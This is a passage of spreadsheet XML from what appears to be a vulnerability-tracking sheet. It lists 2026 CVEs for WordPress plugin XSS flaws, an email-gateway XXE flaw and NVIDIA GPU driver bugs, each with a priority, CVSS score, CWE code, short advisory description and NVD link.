          <t>Unauthenticated Cross Site Scripting (XSS) in Trusted Shops Easy Integration for WooCommerce &lt;= 2.0.6 versions.</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96816</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96819</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="inlineStr"/>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in oik &lt;= 4.15.4 versions.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96819</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96820</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr"/>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in Awesome Support &lt;= 6.3.9 versions.</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96820</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96830</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in GiveWP &lt;= 4.16.9 versions.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96830</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96836</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Parsi Date &lt;= 6.3 versions.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96836</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97065</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Happyforms &lt;= 1.26.15 versions.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97065</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97077</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr"/>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Ad Inserter &lt;= 2.8.18 versions.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97077</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97235</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr"/>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in ThemeREX Addons &lt; 2.45.0 versions.</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97235</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97237</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JetEngine &lt;= 3.8.14.3 versions.</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97237</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97250</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in  Geo Mashup &lt;= 1.13.21 versions.</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97250</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97253</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr"/>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kreatura LayerSlider allows Reflected XSS.
This issue affects LayerSlider: from n/a through 8.4.0.</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97253</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97271</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="inlineStr"/>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WPFunnels &lt;= 3.13.1 versions.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97271</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97272</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr"/>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Premmerce Permalink Manager for WooCommerce &lt;= 2.3.13 versions.</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97272</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97289</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr"/>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Quiz And Survey Master &lt;= 11.2.6 versions.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97289</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97290</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="inlineStr"/>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Photonic Gallery &amp; Lightbox for Flickr, SmugMug &amp; Others &lt;= 3.36 versions.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97290</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102127</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="inlineStr"/>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>An XML parser used by Kiteworks Email Protection Gateway did not restrict external entity references. Where an optional, non-default message-processing feature is enabled, a remote and unauthenticated sender could potentially use a crafted message to read files accessible to the gateway service account, including cryptographic key material and credentials, and have them sent to a destination they control.</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102127</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47582</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr"/>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47582</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47596</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr"/>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>CWE-281</t>
        </is>
      </c>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user can write to read-only memory because the memory's permissions are not preserved. A successful exploit of this vulnerability might lead to code execution and escalation of privileges.</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47596</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47598</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="inlineStr"/>
